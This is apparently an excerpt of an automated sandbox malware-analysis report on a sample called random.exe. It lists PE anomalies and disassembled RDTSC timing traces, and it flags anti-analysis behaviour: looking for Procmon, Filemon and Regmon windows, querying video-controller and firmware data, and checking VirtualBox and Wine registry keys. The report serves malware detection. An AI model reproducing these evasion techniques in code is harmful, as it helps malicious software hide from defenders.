            Source: random.exeStatic PE information: real checksum: 0x2f79bb should be: 0x2ebda8
            Source: random.exeStatic PE information: section name:
            Source: random.exeStatic PE information: section name: .idata
            Source: random.exeStatic PE information: section name: znhncruu
            Source: random.exeStatic PE information: section name: xqkiidkr
            Source: random.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CCEEC push esi; retf 0_3_006CCEEF
            Source: random.exeStatic PE information: section name: entropy: 7.984082210651368

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\random.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBD9D3 second address: DBD9D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBD9D9 second address: DBD9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBCAC0 second address: DBCADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F8874D4CC94h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBCC56 second address: DBCC6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F887475ED96h 0x0000000d jc 00007F887475ED96h 0x00000013 pop eax 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBCC6A second address: DBCC7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBCC7E second address: DBCC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBCC82 second address: DBCC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBD0C5 second address: DBD0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBF863 second address: DBF867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBF9CF second address: DBFA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add ecx, dword ptr [ebp+122D2FDEh] 0x0000000d push 00000000h 0x0000000f add esi, 78FF51EDh 0x00000015 call 00007F887475ED99h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F887475EDA9h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFA0C second address: DBFA62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007F8874D4CC8Dh 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F8874D4CC99h 0x0000001a mov eax, dword ptr [eax] 0x0000001c ja 00007F8874D4CC8Eh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFA62 second address: DBFA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFA66 second address: DBFA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 jmp 00007F8874D4CC8Ah 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D1E3Eh], edx 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D2E02h] 0x0000001d push 00000003h 0x0000001f jmp 00007F8874D4CC8Ah 0x00000024 push 6203841Bh 0x00000029 push edi 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFA9D second address: DBFACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 add dword ptr [esp], 5DFC7BE5h 0x0000000d mov edx, dword ptr [ebp+122D2CF2h] 0x00000013 lea ebx, dword ptr [ebp+1245D73Bh] 0x00000019 mov edi, dword ptr [ebp+122D2C92h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F887475EDA0h 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFB23 second address: DBFB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC91h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DBFB3D second address: DBFB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE16E4 second address: DE1701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE1701 second address: DE171A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDF895 second address: DDF89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8874D4CC86h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDFC67 second address: DDFC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDFC6B second address: DDFC7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDFC7E second address: DDFC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F887475EDA4h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDFDDF second address: DDFDF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F8874D4CC8Ah 0x0000000c pop ebx 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DDFDF8 second address: DDFDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE00CC second address: DE00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC93h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE00E5 second address: DE00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F887475ED9Eh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DD801A second address: DD8026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE089A second address: DE08A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE0FB0 second address: DE0FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAC410 second address: DAC418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE763B second address: DE7641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE7641 second address: DE764C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F887475ED96h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE9CD3 second address: DE9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DE9CD7 second address: DE9CE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEDF81 second address: DEDF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEDF89 second address: DEDF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE231 second address: DEE245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F8874D4CC86h 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE507 second address: DEE519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE519 second address: DEE524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8874D4CC86h 0x0000000a pop esi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE524 second address: DEE546 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F887475EDA8h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE6CE second address: DEE6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8874D4CC86h 0x0000000a pop edi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE6D9 second address: DEE6F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F887475ED96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE6F4 second address: DEE6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE6F8 second address: DEE6FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DEE6FC second address: DEE702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF29EB second address: DF29F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F887475ED96h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF29F6 second address: DF29FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF2D7A second address: DF2D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF2D80 second address: DF2D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8874D4CC8Bh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF2D94 second address: DF2D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF330E second address: DF3329 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8874D4CC8Ch 0x00000008 jns 00007F8874D4CC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F8874D4CC88h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF3390 second address: DF3395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF3395 second address: DF33AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F8874D4CC88h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF33AC second address: DF33C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF3E2D second address: DF3ECD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8874D4CC94h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F8874D4CC88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D3142h], eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F8874D4CC88h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 ja 00007F8874D4CC8Bh 0x0000004f push 00000000h 0x00000051 jmp 00007F8874D4CC8Ch 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F8874D4CC96h 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF481B second address: DF4897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F887475EDA4h 0x0000000e popad 0x0000000f nop 0x00000010 mov si, 5AB3h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F887475ED98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2D4Ah] 0x00000036 push 00000000h 0x00000038 sub dword ptr [ebp+122D1E57h], ebx 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 jmp 00007F887475EDA5h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF4897 second address: DF489B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF5A2E second address: DF5A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF6EE5 second address: DF6EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F8874D4CC86h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF7880 second address: DF7884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF7884 second address: DF788A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8344 second address: DF839D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F887475EDA1h 0x00000012 pop eax 0x00000013 nop 0x00000014 or dword ptr [ebp+122D2C06h], ecx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F887475ED98h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 pushad 0x0000003a jno 00007F887475ED98h 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 pop edx 0x00000044 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF839D second address: DF83A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFC153 second address: DFC157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFC157 second address: DFC15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8C82 second address: DF8CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F887475ED96h 0x0000000a popad 0x0000000b jmp 00007F887475EDA0h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFC15B second address: DFC1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8874D4CC8Ch 0x0000000c jns 00007F8874D4CC86h 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 jng 00007F8874D4CC88h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e jp 00007F8874D4CC86h 0x00000024 jne 00007F8874D4CC86h 0x0000002a popad 0x0000002b popad 0x0000002c nop 0x0000002d mov bh, cl 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 jmp 00007F8874D4CC92h 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a jno 00007F8874D4CC8Ch 0x00000040 push eax 0x00000041 push edx 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8CA5 second address: DF8CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8CA9 second address: DF8CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8CAD second address: DF8CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DF8CB3 second address: DF8CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E03422 second address: E03429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E01471 second address: E01475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
